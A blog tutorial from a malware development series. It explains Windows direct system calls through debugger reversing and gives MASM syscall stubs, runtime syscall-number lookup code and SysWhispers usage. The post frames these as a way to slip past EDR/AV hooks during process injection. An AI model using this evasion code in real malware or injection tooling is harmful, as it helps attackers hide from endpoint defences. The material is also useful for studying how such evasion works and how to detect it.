Direct System Calls

August 20th, 2023

Table of Contents

Prerequisites

This blog entry is the next logical progression of our malware development series. This post assumes that you're already comfortable with WinAPI and aware of some NTAPIs exported from ntdll.dll. Hopefully, you've gone ahead and tinkered with some of these topics as we've already done below:

Overview

In the last blog post, we talked about the process - rather, the "flow path" that a typical WinAPI function (like WriteFile, CreateFile, etc.) will take from "user-land" all the way down to "kernel-land." So naturally, let's shimmy down a tiny step lower and look at what actually happens to our functions when we reach that threshold to the kernel-space. Furthermore, we'll see how we might be able to leverage these system calls for our purposes as malware developers. Let's revisit this picture from the previous blog to get a better idea of what we're about to talk about:

When WriteFile makes its trek down the user-space, it resolves into a lower, less-abstracted function which, along with many other functions (prefixed with Nt/Zw), is exported from ntdll.dll. For WriteFile, its NTAPI counterpart from ntdll.dll is called NtWriteFile. Then, it crosses over to the kernel-space using the SYSENTER or SYSCALL instructions.

To get a grasp of the differences between the different syscall instructions, read this.

These syscalls allow us and our programs (which reside in the user-space) the ability to interface with the Kernel directly. Since we, as user-space residents can't operate in the Kernel, we need these intermediaries/interfaces in order to (indirectly) do it for us. This is due to the fact that by design, our being able to do so would be in direct violation of the "Principle of Least Privilege (PoLP)" that gives rise to the protection rings that are the foundation of our modern operating systems:

Of course, by now, you should already know what these rings are, where/when they're used, and their features/privileges. This is great and all but I still have to sell you the idea of actually using syscalls. So far, we haven't really seen any useful cases/scenarios in which a syscall should be used over what we've already been doing with the NTAPI.

The Benefit of Syscalls

You might be thinking, "crow, aside from removing yet another abstraction, what's the point of using syscalls when the NTAPI was serving us so well?" Well, typically, the lower you go the more fine-tunability and control you're given for your programs. However, using syscalls directly is most fruitful in cases where pesky EDRs/AVs have hooked our functions. I won't get too in-depth about API Hooking because that topic deserves a blog post all on its own but here's a quick rundown:

API Hooking is one of the techniques used by defensive solutions - like EDRs/AVs, that monitors and intercepts calls to commonly abused APIs (such as CreateRemoteThreadEx, NtAllocateVirtualMemory, et cetera); as well as the arguments supplied to them, and redirects the execution flow of a function. Typically, hooks are implemented using trampolines or inline hooking (again, we'll get into these in another blog post). Generally, in order to do all of this, an EDR will load/inject its own DLL into a process:

The way these hooks actually change the execution flow of the function is by replacing the first five (5) bytes of the function with an unconditional jmp instruction (meaning that no matter what, when the instruction is reached, it will jump to the address specified). Observe the following image, it shows a typical (unhooked) function and a hooked one:

This is done in an attempt to monitor which APIs are being called, in what order, what arguments are being supplied to them, etc. However, because we know that hooked syscalls begin with the opcodes: e9 0f 64 f8, it makes it pretty trivial to find hooked functions by checking to see if the first couple of bytes are e9 0f 64 f8 or not. So, instead of calling a function like NtWriteVirutalMemory and risk having our function and its arguments redirected and examined by those EDRs, we could just issue out the syscall ourselves - since defensive solutions can't really hook the invocation of a system call instruction (don't celebrate too early, it's still pretty easy for them to detect it).

Direct syscalls aren't EDR/AV-bypassing magic spells. It's still really easy for defensive solutions to figure out that something malicious is going on. Why would a normal, boring, unassuming-ass program need to invoke syscall, sysenter, int 2eh inside of it? We'll go into more depth about this in a later module, but an EDR can see if a syscall originated from your program or if it had a natural progression as one would expect down to a syscall. So, don't be fooled - syscalls are cool and all, but we'll still need to put in some elbow grease.

Anyways, it's time to move on to the "identifiers" of these syscalls, i.e., the syscall numbers. If you want an easy-to-follow video that reiterates what's been said above, I'd urge you to watch the following:

System Call Numbers

Before a syscall is invoked, a specific value that's specific to the function being called is put into the eax register. These identifying numbers are called System Service Numbers (SSNs). Because syscalls belong to the taboo-undocumented and low-level sector of Microsoft technology, it's important to note that these numbers aren't always the same for each build/version of Windows. A system call number can change (and without warning) - which is why Microsoft is so vehemently against us fiddling around with undocumented shit. The best way to understand what SSNs or "syscalls numbers" are is by taking a look at a real disassembled function. We'll start from the more abstracted Win32 API, and walk down until we finally get to the syscall stub. Let's consider the following code:

#include <windows.h>
#include <stdio.h>

int main(int argc, char **argv) {

	if (argc < 2) {
		puts("usage: handles.exe <PID>");
		return -1;
	}

	DWORD PID = atoi(argv[1]);
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);

	if (hProcess == NULL) {
		printf("[OpenProcess] failed, error: 0x%lx", GetLastError());
		return -1;
	}

	printf("[%p] got a handle to the process!", hProcess);
	CloseHandle(hProcess);
	(void)getchar();
	return 0;
}

It's a very simple program that'll just get a handle on a process with a supplied PID. If we open this up in a debugger, like x64dbg, we'll see the symbols present in this program, as well as the modules from which we're importing said symbols from.

The following section isn't necessary. You can very easily just look into each subsequent module for the functions you're looking for within x64dbg or any other debugger. In other words, instead of finding our main function, seeing a call to kernel32!OpenProcess -> kernelbase!OpenProcess -> ntdll!NtOpenProcess, etc., you can just look within the symbols tab, and select the module you want (ntdll), and find the function (NtOpenProcess) there if you search for it. I'm just showing this off to start building up our reverse engineering skills little by little. If you want to look at the syscalls right away without all this mumbo-jumbo, then see the images below.

Then, we search for the NTAPI that we want to disassemble, in this case, we'll do NtOpenProcess:

After finding the function we want, we can double-click on it and we'll see the syscall stub for the function:

And there you go! It's as simple as that. If you want to get a more "reverse-engineer-y" perspective, then please read on! Otherwise, click here to move on to the next section, if you're already familiar with syscall stubs and such.

Reversing Our Program

After opening up our program in the debugger, we can look for the handles.exe "module" and in the symbols pane, we can search for "main" to find the core logic behind our program.

If we select this, we'll see the following in the debugger:

To see this in a more "manageable" way, we can enter the "graph" view by pressing the g key:

Since we're targeting OpenProcess and its lower-level NTAPI counterpart, we'll go to the section where that function resides to see what's happening.

If we press g again to go into the text view, and hover on the call qword ptr ds:[<&OpenProcess>] line, we can see the see that our call to OpenProcess resolves to the OpenProcess from Kernel32 being called:

Before checking out what the OpenProcess in Kernel32 does, we can see the arguments for our OpenProcess function right above the call to the function. If you can recall, we very briefly covered "calling conventions" in the DLL Injection post. In it, we mentioned how the Windows API uses the __stdcall calling convention.

Just below this paragraph, we can see a really useful table that shows us the particularities of the __stdcall calling convention:

You can read more about this calling convention below:

From the table above, we can see that in the __stdcall calling convention, our arguments are passed right to left and the called function cleans up after itself by popping its own arguments from the stack. Looking at our OpenProcess function, as well as the arguments, we should expect to see the arguments passed on the stack from right to left, as seen in the image below:

And indeed, if we look at the disassembly, we can see that it does follow this convention. We expect to see the dwProcessId first, followed by bInheritHandle, and lastly, the dwDesiredAccess:

Also, please don't limit yourself to one debugger. It's very fun (in my opinion) to see what this might look like in another debugger. For example, let's look at OpenProcess in yet another debugger, WinDbg. We can see the same thing (although note that this is a x86 version of the handles.exe program)!

Let's quickly take a moment to understand the assembly just to make sure that what we have there are actually the arguments. Starting with the first argument (in the disassembly view, that is) dwProcessId. We can see that it gets its value from ss:[rbp+4] and places it in the lower DWORD of the r8 register (which is denoted by the "d" suffix in "r8d", read more here):

mov r8d, dword ptr ss:[rbp+4]

If we set a breakpoint on this instruction (also making sure to supply a CLI argument (File > Change Command Line > "c:\path\to\program.exe" <PID>) to the PID of the process we want to get a handle on, in my case, I'm just gonna target a simple notepad) and run the program by hitting this icon at the top:

Or entering in g/go in the command box section at the bottom. We can see that once we hit the breakpoint on this instruction:

The r8 register (which is going to eventually hold our target's PID), isn't set to anything resembling our supplied PID:

After stepping a single instruction (sti/StepInto in the command box), just so the mov r8d, dword ptr ss:[rbp+4] instruction has actually been executed, we can see that the r8 register does update to a new value:

This value "0x4788", is actually our PID! All we have to do is convert this to decimal to see it:

Okay, so the dwProcessId argument is in the right place with the right value. Let's move on to bInheritHandle. We've set this to FALSE in our code:

And, as we know, if we XOR something against itself, it'll just be 0. And, that's definitely happening here:

xor edx, edx

We can see this reflected here in the RDX register as well, after stepping a single instruction:

Lastly, we have the dwDesiredAccess. In the code, we've set this to the "PROCESS_ALL_ACCESS" access right, which is the value (0x1FFFFF):

These individual rights, when added up (0x000F0000L + 0x00100000L + 0xFFFF) equals to 0x1FFFFF.

This is definitely the value we see right before the call to our OpenProcess function, and we'll see that this value gets put into the RCX register as well before the call to OpenProcess.

Let's finally inspect the call to the OpenProcess instruction. We know from previous posts that pretty much all of the WinAPI functions we've used to this point have been exported from a library called Kernel32. If we double-click on this OpenProcess symbol from the disassembly, we'll see the following:

Our function gets resolved into the OpenProcess that's exported from Kernel32. Double-clicking this and then going into graph-view, we can see:

It's evident now that whenever we call certain functions that are exported by a library like Kernel32, as seen from the code, our function doesn't run right away. In a previous blog post, we talked about this behaviour; how our function actually gets its' functionality from kernelbase.dll and how there's this little proxy-footsie dance going on. A quote from the previous blog:

So this begs the question then, what the hell is that KERNELBASE.dll thing and where did it come from? KERNELBASE was made by Microsoft to act as a sort of "proxy" for your API calls. If we look at the documentation, we can see it being discussed here:
"As an example of functionality that we moved to low-level binaries, kernelbase.dll gets functionality from kernel32.dll and advapi32.dll. This means that the existing binary now forwards calls down to the new binary rather than handling them directly..."

The point is, when we call OpenProcess from our code, the journey has just begun. If we look at where the <kernel32.OpenProcess> section is jumping to, we can see that it goes to the OpenProcess inside of kernelbase.dll:

We can double-click this and graph view this as well to get a better picture of what's happening here:

We're almost inside the syscall section. From kernelbase.dll, we can see that there's yet another call to a function, more specifically, we're calling the lower-level NTAPI exported from ntdll.dll: NtOpenProcess. You can see this in the line call qword ptr ds:[<NtOpenProcess>]

Finally, let's once again see the graph view of this (the "text" view is sufficient in understanding the workings of the syscall stubs, it's just with a graph, it's a bit easier to see the flow when it comes to jumps - especially if you're newer to the whole reversing-practice).

The most important part to pay attention to from this syscall stub is the following instruction:

mov eax, 26 ; SSN

The value "0x26" is the syscall number. This is the number associated with the NtOpenProcess function. After moving the syscall number into the eax register, there's a test byte ptr ds:[7FFE0308],1 instruction to determine if the syscall instruction is to be used or if the int 2E instruction is to be used. The int 2E instruction was used in 32-bit Windows to enter kernel-mode, hence the "legacy syscall instruction."

"The system call dispatcher on x86 NT has undergone several revisions over the years. Until recently, the primary method used to make system calls was the int 2e instruction (software interrupt, vector 0x2e). This is a fairly quick way to enter CPL 0 (kernel mode), and it is backwards compatible with all 32-bit capable x86 processors. With Windows XP, the mainstream mechanism used to do system calls changed; From this point forward, the operating system selects a more optimized kernel transition mechanism based on your processor type. Pentium II and later processors will instead use the sysenter instruction, which is a more efficient mechanism of switching to CPL 0 (kernel mode), as it dispenses with some needless (in this case) overhead of usual interrupt dispatching." - Nynaeve

You might be wondering what that 0x7FFE0308 address is. In Windows, there's a structure called KUSER_SHARED_DATA which as the legendary Geoff Chappell mentions in his post, "The [...] address for the shared data [structure] is 0x7FFE0000, both in 32-bit and 64-bit Windows." This structure is incredibly important when it comes to Windows Internals and for us as malware developers.

"The KUSER_SHARED_DATA structure defines the layout of a data area that the kernel places at a pre-set address for sharing with user-mode software. The original intention seems to have been to enable user-mode software to get frequently needed global data, notably the time, without the overhead of calling kernel mode." - Geoff Chappell

If we dump this structure and take a look at some of its members, we can see what's being tested in that test byte ptr ds:[7FFE0308],1 line.

0:000> dt ntdll!_KUSER_SHARED_DATA 0x7FFE0000
   +0x000 TickCountLowDeprecated : 0
   +0x004 TickCountMultiplier : 0xfa00000
   +0x008 InterruptTime    : _KSYSTEM_TIME
   +0x014 SystemTime       : _KSYSTEM_TIME
   +0x020 TimeZoneBias     : _KSYSTEM_TIME
   +0x02c ImageNumberLow   : 0x8664
 [...]
   +0x2f8 TestRetInstruction : 0xc3
   +0x300 QpcFrequency     : 0n10000000
   +0x308 SystemCall       : 0              ; 7FFE0308
   +0x30c Reserved2        : 0
   +0x310 SystemCallPad    : [2] 0
   +0x320 TickCount        : _KSYSTEM_TIME
   +0x320 TickCountQuad    : 0x6f74bb
   +0x350 BaselineInterruptTimeQpc : 0x00000109`bb6c758a
[...]
   +0x3c8 TimeZoneBiasEffectiveStart : _LARGE_INTEGER 0x01d9da15`f5332463
   +0x3d0 TimeZoneBiasEffectiveEnd : _LARGE_INTEGER 0x01da0fad`4f987000
   +0x3d8 XState           : _XSTATE_CONFIGURATION
   +0x710 FeatureConfigurationChangeStamp : _KSYSTEM_TIME
   +0x71c Spare            : 0

We can see that the SystemCall member resides at the offset of 0x308. So, the test byte ptr ds:[7FFE0308],1 instruction is testing (performing a bitwise AND operation) to see if the bit at the address 0x7FFE0308 (KUSER_SHARED_DATA->SystemCall) is set to 1 or not. On my machine, we can see that it's 0:

0:000> db 0x7FFE0308 L1
00000000`7ffe0308  00

Originally, when I was first trying to understand the flow of this stub, I was pretty confused since my KUSER_SHARED_DATA->SystemCall was set to 0 and I had thought that the int 2Eh branch would be trigged. I had assumed that the flow would look something like:

00007FFE4F5CD4C8 | F60425 0803FE7F 01   test byte ptr ds:[7FFE0308],1
00007FFE4F5CD4D0 | 75 03                jne ntdll.7FFE4F5CD4D5 -------
00007FFE4F5CD4D2 | 0F05                 syscall                      |
00007FFE4F5CD4D4 | C3                   ret                          |
00007FFE4F5CD4D5 | CD 2E                int 2E <----------------------
00007FFE4F5CD4D7 | C3                   ret

However, after setting a breakpoint on both the syscall and int 2E instructions to see which would get invoked, I noticed that indeed, the syscall instruction was the one being hit:

So, what's going on here? The value being compared (1) to the SystemCall member (which again, on my machine was 0) aren't equal ( $1 \ne 0$ ), so with it not being equal, shouldn't we have jne to the int 2E instruction at the address 00007FFE4F5CD4D5?

Yes, I know many of you assembly veterans are clawing at your walls and screens right now - but I'm providing this for newcomers who may have struggled with this concept as I once did.

You see... the issue was that my understanding of the jne and test instructions were flawed - I kept mistaking a test instruction for a cmp instruction - my logic would be sound in the case that the test being done was being done with a cmp. However, with a test instruction, it's a bit different which is why I was getting so confused. So, let's delve into this really quickly to clear everything up. Please skip to the next section if you're not interested.

TEST, CMP, JNE, ZF Waltz

The test instruction performs a bitwise AND operation on two operands. Meanwhile, a cmp just does a subtraction. For example, in the case of the test instruction, performing a test on 1011 and 1101 would look something like:

; test (bitwise-AND (&))
1011
1101
----
1001

The results of these operations (test and cmp) aren't actually kept, rather, the flags that they alter during these operations are kept. There are a couple of flags that get used by the test instruction, but the one we're most interested in is the ZF (Zero Flag). If the result of the test operation is 0, the ZF is set to 1, otherwise, it's set to 0. When we get to the jne ntdll.7FFE4F5CD4D5 instruction:

We can see that at that moment, the ZF flag is set to 1:

So, the jne instruction jumps (or doesn't) to the specified address depending on the value of the ZF flag and whether it's set to 0 or not. If the ZF flag is one (1) then the jne is skipped and the location of the jne instruction isn't jumped to. However, if the ZF flag is zero (0), then indeed, the jne instruction will jump to the address that it's given. If instead of a test instruction a cmp instruction was made, then yeah, we'd be right and our execution flow would land on the int 2eh branch. Look at the following two images that show this:

We can see that if we set a breakpoint on the actual jne ntdll.7FFE4F5CD4D5 instruction, and toggle the ZF flag off manually (either by double-clicking it or selecting it and pressing space), then we can force flow to change to int 2e:

It's a bit subtle but you can see the new red arrow pointing to the execution path we'd end up taking. We can hit run and we'll see that we'll end up hitting the int 2E instruction!

Very fascinating stuff! I apologize for the incredible detour we just took but hopefully we have a deeper understanding of all these various concepts now. You can read more here if you'd like:

So far we've gotten a pretty decent picture of what happens on the user-mode side when we call a function. If you'd like a more in-depth view of what actually happens on the kernel-mode side after a system call has been issued, please refer to the amazing Alice Climent-Pommeret's blog post on the subject, their work is (always) fantastic and definitely worth the read!

With that being said, I've taken the liberty of drawing a ~~shitty~~ little graph of the execution flow of a typical WinAPI function:

With this gargantuan tangent finally over with, let's discuss how we may be able to dump these syscall numbers so that we can use them in our malware.

Dumping Syscall Numbers

The astute amongst you might already be thinking that you can just look inside of ntdll, find the function you need, and then dump the syscall numbers for said functions. Yes! You 100% can do that and that's typically how these syscall numbers are dumped (well, typically they're dumped from ntdll on-disk since it's more of a guarantee that things won't be altered). The only thing about this approach is that it can get really-really fucking tedious. Luckily, there are people like j00ru and his amazing syscall table in which you get all of these dumped syscalls for a variety of different Windows versions and builds:

If we look for the syscall number we had for NtOpenProcess (0x26), we'll very quickly find our function - and we can see the syscall numbers for the previous builds and versions:

Again, with things like syscalls, as you can see from the table, these things can change without warning. Furthermore, as great as the syscall table is, the official repository only goes up to Windows 10, build 20H2.

So, although it's not much different from what we've been doing - having a place where you can just Ctrl+F and search for your function and immediately get the syscall number for it, is really useful. However, again, since our version of Windows is newer than the table's last dump, we should exercise some caution. For that reason, I'll just be dumping my syscall numbers manually (you can use any debugger/disassembler/method for this).

Some of you might be raising your fists in the air wondering where syswhispers is. I'll be going over syswhispers after we've done everything manually since I believe in the "do it manually first and then find a tool that does the heavy lifting for you" approach. If you can't be arsed, click here to jump to the syswhispers section.

So, like we've done for the NtOpenProcess function, I'll rinse and repeat for all the functions we'll be using for this injection. Note that I'm currently on Windows 10, 22H2:

0:000> uf NtOpenProcess
[...]
00007ff8`aabed4c3 b826000000      mov     eax,26h
[...]

0:000> uf NtAllocateVirtualMemory
[...]
00007ff8`aabed303 b818000000      mov     eax,18h
[...]

0:000> uf NtWriteVirtualMemory
[...]
00007ff8`aabed743 b83a000000      mov     eax,3Ah
[...]

0:000> uf NtCreateThreadEx
[...]
00007ff8`aabee833 b8c2000000      mov     eax,0C2h
[...]

0:000> uf NtWaitForSingleObject
[...]
00007ff8`aabed083 b804000000      mov     eax,4
[...]

0:000> uf NtClose
[...]
00007ff8`aabed1e3 b80f000000      mov     eax,0Fh
[...]

With all of our syscall numbers dumped, we can move on to actually programming this!

Implementation

Because of the fact that we're introducing some assembly code to our project, we're going to have to do some setup inside Visual Studio to get everything working as intended (you can try to mess around with inline-asm but do note that MSVC doesn't allow you to do inline-asm for x64. So, you could look into the intel compiler, some other method, or just compile the assembly files like we're doing here). For ease of viewing and following along, I've separated the implementation into two parts: the assembly portion and the regular portion.

The Assembly Portion

We'll start by making a new empty project within Visual Studio (name it whatever you want; bonus points if you name it something funny):

Now, we're going to set up our project to use the Microsoft Macro Assembler (MASM). That's how we're going to be compiling our assembly code. Start by right-clicking your project name:

From the menu, we want to go to Build Dependencies > Build Customizations:

Once the new window pops up, we want to toggle the masm(.target, .props) option:

Press OK and we can move on! With that finished, we can now compile .asm files which is awesome because now we're going to begin programming with our syscall numbers that we've dumped. All we're going to be doing in a sense is just copying what a standard syscall stub looks like. That's pretty much it - there are some more complex .asm programs that will determine which build of Windows you are and redirect you to the syscall that you should use (syswhispers foreshadowing), but we'll keep ours as simple as we can for now to build a basic foundation. Hit Ctrl+Shift+A to add a new item and we'll call this something like syscalls.asm or something:

It may be tempting to just start keyboard-spamming some incredibly juicy assembly into your newly created file right away but hold on a second. You still need to set this file up to be used with MASM. Sometimes people overlook/forget about this step and it's very easily avoidable.

We then right-click on this newly created file and go to Properties:

In this Window, we want to set the Item Type to Microsoft Macro Assembler (sometimes that'll already be selected, and so if it is, you needn't worry about this step and we can just move on to the programming part) and make sure the Excluded From Build option is set explicitly to No (I don't think you have to set this but it's a simple thing we can toggle to avoid potential headaches - should they arise):

Now, we can finally start programming. Our syscalls.asm file will look something like the following:

; WINDOWS 10, 22H2 19045

.code

NtOpenProcess PROC
		mov r10, rcx
		mov eax, 26h
		syscall
		ret
NtOpenProcess ENDP

NtAllocateVirtualMemory PROC
		mov r10, rcx
		mov eax, 18h
		syscall
		ret
NtAllocateVirtualMemory ENDP

NtWriteVirtualMemory PROC
		mov r10, rcx
		mov eax, 3Ah
		syscall
		ret
NtWriteVirtualMemory ENDP

NtCreateThreadEx PROC
		mov r10, rcx
		mov eax, 0C2h
		syscall
		ret
NtCreateThreadEx ENDP

NtWaitForSingleObject PROC
		mov r10, rcx
		mov eax, 4h
		syscall
		ret
NtWaitForSingleObject ENDP

NtClose PROC
		mov r10, rcx
		mov eax, 0Fh
		syscall
		ret
NtClose ENDP

end

636B

syscalls.asm

As we can see, all we've done is recreate the syscall stubs we've disassembled earlier. Luckily for us, our code isn't too difficult to implement or understand.

The Normal Portion

With these syscall stubs set, we can now create a header file that'll house the function prototypes necessary for this to work (recall the two NTAPI Injection blogs). You could do all of this in a single file without a header but we actually take showers here and aren't that nerdy. Just kidding, do whatever you want. The header file just modularizes our code and makes it easier for other developers to read.

3KB

glassBox.h

The extern keyword is pretty much telling the compiler to use our .asm file for the Nt function prototypes that we're defining in our glassBox.h header file. It's very important for us to include this. The great part about this technique as compared to the NTAPI injection techniques for example, is that once this part is done, we can just call the functions as we would normally - without the whole "getting the process address from ntdll.dll using GetProcAddress" fiasco. Instead, we can call it directly! Like this, for example:

[...]

    info("getting a handle on process (%ld)...", PID);
	STATUS = NtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &OA, &CID);
    if (STATUS != STATUS_SUCCESS) {
        warn("[NtOpenProcess] failed, error: 0x%x", STATUS);
        return EXIT_FAILURE;
    }
    okay("got a handle on the process!");
    info("\\___[ hProcess\n\t\\_0x%p]", hProcess);

[...]

With that being said, we already know all of these arguments and what they should be because we've covered them in the previous two blog posts. So, I won't be reiterating all of that here since this blog is already ludicrously long to begin with. Here's what the code should look like:

6KB

directsyscalls.c

Aside from the following section, everything should be making sense since we've already done this before:

    for (int i = 0; i < sizeof(crowPuke); i++) {
        if (i % 16 == 0) {
            printf("\n  ");
        }
        Sleep(1);
        printf(" %02X", crowPuke[i]);
    }
    puts("\n");

This is totally unnecessary code. You can get rid of this if you want. It'll be even faster since there won't be a 1ms sleep betwixt bytes being printed, but I wanted to have fun with this one and it just looks cool. Your choice, homie.

All this does is print out our shellcode (one byte at a time with a 1ms sleep per byte). Once it's printed 16-bytes in a row, it'll do a newline and start printing again; rinsing and repeating until it's done with all the shellcode. With that being said, let's finally see this in action.

Everything works beautifully. Let's now cover something that'll make this process even more streamlined and automated.

Dynamic Syscall Retrieval

When I first attempted this technique months ago, I had a thought that we should be able to dynamically retrieve these syscall numbers from the syscall stubs by just looking at the mov eax, SSN line. Well, at that time, I lacked the programmatic prowess to actually follow that through but upon reading a really fantastic blog on direct syscalls by a really cool person, VirtualAllocEx, aka Daniel Feichter from RedOps, I saw that he had done exactly that! You're urged to go and read his incredible blog below - it's much better than my garbage:

So, I used his dynamic syscall retrieval method and turned it into a single function (I'm sure this can be made even better, and you're urged to try. Again, my programming "skills" are still really subpar but I'm always learning so ):

/*-----------[SEEK SYSCALLS]-----------*/
DWORD GetSSN(IN HMODULE hNTDLL, IN LPCSTR NtFunction) {

    DWORD NtFunctionSSN = NULL;
    UINT_PTR NtFunctionAddress = NULL;

    info("trying to get the address of %s...", NtFunction);
    NtFunctionAddress = (UINT_PTR)GetProcAddress(hNTDLL, NtFunction);

    if (NtFunctionAddress == NULL) {
        warn("failed to get the address of %s", NtFunction);
        return NULL;
    }

    okay("got the address of %s!", NtFunction);
    info("getting SSN of %s...", NtFunction);
    NtFunctionSSN = ((PBYTE)(NtFunctionAddress + 4))[0];
    okay("\\___[\n\t| %s\n\t| 0x%p+0x4\n\t|____________________0x%lx]\n", NtFunction, NtFunctionAddress, NtFunctionSSN);
    return NtFunctionSSN;

}

We will have to edit our .asm file to use an external variable (which we're going to be populating with our GetSSN function) instead of a hardcoded SSN since we're doing this dynamically now:

.data

; we're going to be getting these SSN numbers from our c program
EXTERN NtCloseSSN:DWORD                
EXTERN NtOpenProcessSSN:DWORD          
EXTERN NtCreateThreadExSSN:DWORD       
EXTERN NtWriteVirtualMemorySSN:DWORD   
EXTERN NtWaitForSingleObjectSSN:DWORD  
EXTERN NtAllocateVirtualMemorySSN:DWORD

.code

NtOpenProcess proc
		mov r10, rcx
		mov eax, NtOpenProcessSSN       ; SSN will be retrieved by reading &function+0x4
		syscall                         ; can replace with int 2eh as well
		ret                             
NtOpenProcess endp

NtAllocateVirtualMemory proc
		mov r10, rcx
		mov eax, NtAllocateVirtualMemorySSN      
		syscall                        
		ret                             
NtAllocateVirtualMemory endp

NtWriteVirtualMemory proc
		mov r10, rcx
		mov eax, NtWriteVirtualMemorySSN      
		syscall                        
		ret                             
NtWriteVirtualMemory endp

NtCreateThreadEx proc
		mov r10, rcx
		mov eax, NtCreateThreadExSSN      
		syscall                        
		ret                             
NtCreateThreadEx endp

NtWaitForSingleObject proc
		mov r10, rcx
		mov eax, NtWaitForSingleObjectSSN      
		syscall                        
		ret                             
NtWaitForSingleObject endp

NtClose proc
		mov r10, rcx
		mov eax, NtCloseSSN      
		syscall                        
		ret                             
NtClose endp
end

Our header file remains the same but in our main program, we need to do a bit of additional setup:

#include "glassBox.h"

DWORD NtCloseSSN; 
DWORD NtOpenProcessSSN; 
DWORD NtCreateThreadExSSN;
DWORD NtWriteVirtualMemorySSN;
DWORD NtWaitForSingleObjectSSN; 
DWORD NtAllocateVirtualMemorySSN;

/*-----------[SEEK SYSCALLS]-----------*/
DWORD GetSSN(IN HMODULE hNTDLL, IN LPCSTR NtFunction) {

    DWORD NtFunctionSSN = NULL;
    UINT_PTR NtFunctionAddress = NULL;

    info("trying to get the address of %s...", NtFunction);
    NtFunctionAddress = (UINT_PTR)GetProcAddress(hNTDLL, NtFunction);

    if (NtFunctionAddress == NULL) {
        warn("failed to get the address of %s", NtFunction);
        return NULL;
    }

    okay("got the address of %s!", NtFunction);
    info("getting SSN of %s...", NtFunction);
    NtFunctionSSN = ((PBYTE)(NtFunctionAddress + 4))[0];
    okay("\\___[\n\t| %s\n\t| 0x%p+0x4\n\t|____________________0x%lx]\n", NtFunction, NtFunctionAddress, NtFunctionSSN);
    return NtFunctionSSN;

}

int main(void) {
 
   /*--------[GET SYSCALLS]--------*/
   hNTDLL = getMod(L"NTDLL");
   NtOpenProcessSSN = GetSSN(hNTDLL, "NtOpenProcess");
   NtAllocateVirtualMemorySSN = GetSSN(hNTDLL, "NtAllocateVirtualMemory");
   NtWriteVirtualMemorySSN = GetSSN(hNTDLL, "NtWriteVirtualMemory");
   NtCreateThreadExSSN = GetSSN(hNTDLL, "NtCreateThreadEx");
   NtWaitForSingleObjectSSN = GetSSN(hNTDLL, "NtWaitForSingleObject");
   NtCloseSSN = GetSSN(hNTDLL, "NtClose");
  
  return EXIT_SUCCESS;
}

The getMod function that you see in the line: hNTDLL = getMod(L"NTDLL"); is another function I made for getting handles to modules (covered in the full NTAPI blog), it's nothing special but a nice little QoL time saver:

HMODULE getMod(IN LPCWSTR modName) {

    HMODULE hModule = NULL;
    info("trying to get a handle to %S", modName);

    hModule = GetModuleHandleW(modName);

    if (hModule == NULL) {
        warn("failed to get a handle to the module, error: 0x%lx\n", GetLastError());
        return NULL;
    }

    else {
        okay("got a handle to the module!");
        info("\\___[ %S\n\t\\_0x%p]\n", modName, hModule);
        return hModule;
    }

}

This brings the entirety of this blog post to the following final code. And finally, without further ado, here's the direct syscalls injection with dynamic SSN retrieval:

SysWhispers

No doubt, if you've spent any amount of time researching or participating in the development of malware, you've probably come across a tool (or versions of this tool) called "syswhispers". It's not without reason, after all. You know how we've created a syscalls.asm file with all of our syscall stubs in it, the function prototypes in our glassBox.h header file, etc.? Well, here comes syswhispers to do all that heavy lifting for you. All you have to do is supply the version of Windows you'd like to target, and the function names that you want the assembly stubs for, and you're done!

It's important to note that syswhispers comes in multiple versions, each version bringing something new to the table. For instance, a caveat of the first version of syswhispers is that it only goes up to Windows 10, 21H1. It also lacks features that its more updated versions; syswhispers2 and syswhispers3 include, so it's worth looking around and experimenting.

We start by cloning the repo, which you can find here:

If we run this without any arguments, we can see the following:

We can see that there are some presets we can use like: all to get all the syscalls possible or the most "common" ones with the common preset. We'll manually define ours because the output can get really large. We'll supply the following to the script:

C:\tools\SysWhispers-master\SysWhispers-master>python syswhispers.py -f NtOpenProcess,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtWaitForSingleObject,NtClose -v 10 -o syscalls

  ,         ,       ,_ /_   .  ,   ,_    _   ,_   ,
_/_)__(_/__/_)__/_/_/ / (__/__/_)__/_)__(/__/ (__/_)__
      _/_                         /
     (/                          /   @Jackson_T, 2019

SysWhispers: Why call the kernel when you can whisper?

Complete! Files written to:
        syscalls.asm
        syscalls.h

We can see that the script generates two files for us! If we look at the generated files, starting with the assembly file, we can see the core logic behind what syswhisper is doing:

.code

NtOpenProcess PROC
	mov rax, gs:[60h]                   ; Load PEB into RAX.
NtOpenProcess_Check_X_X_XXXX:               ; Check major version.
	cmp dword ptr [rax+118h], 10
	je  NtOpenProcess_Check_10_0_XXXX
	jmp NtOpenProcess_SystemCall_Unknown
NtOpenProcess_Check_10_0_XXXX:              ; Check build number for Windows 10.
	[...]
	cmp word ptr [rax+120h], 19042
	je NtOpenProcess_SystemCall_10_0_19042
	cmp word ptr [rax+120h], 19043
	je NtOpenProcess_SystemCall_10_0_19043
	jmp NtOpenProcess_SystemCall_Unknown   
	[...]
NtOpenProcess_SystemCall_10_0_19042:        ; Windows 10.0.19042 (20H2)
	mov eax, 0026h
	jmp NtOpenProcess_Epilogue
NtOpenProcess_SystemCall_10_0_19043:        ; Windows 10.0.19043 (21H1)
	mov eax, 0026h
	jmp NtOpenProcess_Epilogue
NtOpenProcess_SystemCall_Unknown:           ; Unknown/unsupported version.
	ret
NtOpenProcess_Epilogue:
	mov r10, rcx
	syscall
	ret
NtOpenProcess ENDP

	[...]

The assembly code starts off by loading the Process Environment Block (PEB) into the RAX register. It does this because the PEB structure holds the major Windows version and build number within some of its members at the 0x118 (OSMajorVersion) and 0x120 (OSBuildNumber) offsets respectively:

0:000> dt _PEB @$PEB
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ''
   +0x001 ReadImageFileExecOptions : 0 ''
   +0x002 BeingDebugged    : 0x1 ''
   [...]
   +0x108 GdiDCAttributeList : 0
   +0x10c Padding3         : [4]  ""
   +0x110 LoaderLock       : 0x00007ffa`330165c8 _RTL_CRITICAL_SECTION
   +0x118 OSMajorVersion   : 0xa    ; 10    (Windows 10)
   +0x11c OSMinorVersion   : 0
   +0x120 OSBuildNumber    : 0x4a65 ; 19045 (Build 19045)
   +0x122 OSCSDVersion     : 0
   +0x124 OSPlatformId     : 2
   [...]

